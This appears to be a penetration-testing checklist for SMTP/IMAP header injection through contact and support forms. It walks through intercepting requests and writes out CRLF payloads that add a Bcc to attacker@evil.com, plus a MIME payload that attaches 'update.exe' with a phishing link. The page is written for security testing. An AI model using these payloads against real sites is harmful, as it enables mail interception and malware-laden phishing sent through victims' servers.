IMAP SMTP Injection
Check List
Methodology
Black Box
Email field
Navigate to email-sending features such as Contact Us, Support, Feedback, Send Message, or Invite User forms It's like paths /contact, /support, /feedback, /send-email, or /ask
Fill in the input fields like email, name, subject, and message with normal values, then intercept the request using Burp Suite
Locate user-controlled fields in the intercepted request (email=gupta@gmail.com, name=Bless, message=Hello)
Inject CRLF (%0d%0a or \r\n) into any field to insert a new email header
email=gupta@gmail.com%0d%0abcc:attacker@evil.comForward the modified request and check your attacker-controlled inbox (attacker@evil.com). If you receive a copy of the email with the injected header, injection is confirmed and Look for BCC/CC in received mail
similar endpoints like /notify, /share, /invite, /ticket, or /api/mail
Reflected In The Confirmation Email or Response
Navigate to any email-sending form such as Contact Us, Support, Feedback, Get in Touch, Send Message, or Report Issue
l in the form with normal values Then intercept the request using Burp Suite.
Capture the full POST/GET request to /contact or /send
Check if the email field is reflected in the confirmation email or response. If yes, proceed to injection testing
Inject CRLF + BCC into the email field to receive a blind copy
email=victim@company.com%0d%0abcc:attacker@evil.comForward the request and check attacker@evil.com if you receive the email, injection confirmed
Try malware attachment injection using MIME boundaries
email=victim@company.com%0d%0a
content-type:multipart/mixed; boundary="XYZ"%0d%0a
%0d%0a--XYZ%0d%0a
content-type:text/plain%0d%0a
Your account needs verification: https://evil.com%0d%0a
--XYZ%0d%0a
content-type:application/octet-stream; name="update.exe"%0d%0a
content-disposition:attachment; filename="update.exe"%0d%0a
[base64-encoded payload or dummy data]%0d%0a
--XYZ--White Box
Cheat Sheet
Last updated